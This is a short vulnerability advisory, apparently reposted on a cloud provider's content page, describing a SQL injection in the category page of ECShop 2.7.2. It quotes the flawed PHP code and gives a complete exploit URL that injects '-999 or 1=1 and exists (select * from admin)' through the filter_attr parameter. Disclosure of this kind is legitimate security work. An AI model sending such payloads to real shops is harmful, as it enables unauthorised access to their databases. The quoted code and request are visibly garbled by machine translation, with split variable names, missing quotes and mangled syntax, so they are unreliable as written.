ECSHOP 2.72 Vulnerability

Source: Internet
Author: User

SQL injection vulnerability caused by poor filtering of the category page in ECSHOP mall System

Affected Versions:
ECShop V2.7.2 UTF8_Release0505

Program introduction:
ECSHOP is an open-source free online shop system. Upgraded and maintained by a professional development team to provide you with timely and efficient technical support. You can also customize ECSHOP based on your business characteristics to add special features of your mall.

Vulnerability Analysis:

File category. php
$ Filter_attr_str = isset ($ _ REQUEST [filter_attr])? Trim ($ _ REQUEST [filter_attr]): 0; // 52 rows
$ Filter_attr = empty ($ filter_attr_str )? : Explode (., trim ($ filter_attr_str ));
The variable $ filter_attr_str is an array separated.

// 308 rows
/* Extended item query conditions */
If (! Empty ($ filter_attr ))
{
$ Ext_ SQL = "Select DISTINCT (B. goods_id) FROM ". $ ecs-> table (goods_attr ). "AS ,". $ ecs-> table (goods_attr ). "AS B ". "Where ";
$ Ext_group_goods = array ();

Foreach ($ filter_attr AS $ k => $ v) // locate the product id that meets all the filter attributes */
{
If ($ v! = 0)
{
$ SQL = $ ext_ SQL. "B. attr_value = a. attr_value AND B. attr_id =". $ cat_filter_attr [$ k]. "AND a. goods_attr_id =". $ v;
$ Ext_group_goods = $ db-> getColCached ($ SQL );
$ Ext. = AND. db_create_in ($ ext_group_goods, g. goods_id );
}
}
}
$ V adds SQL queries without any processing, resulting in SQL injection.


Vulnerability exploitation:
Localhost/shop/category. php? Page = 1 & sort = goods_id & order = ASC % 23goods_list & category = 1 & display = grid & brand = 0 & price_min = 0 & price_max = 0 & filter_attr =-999 or 1 = 1 and exists (select * from admin)

Solution:
Vendor patch
ECSHOP
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Ecshop

 


 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.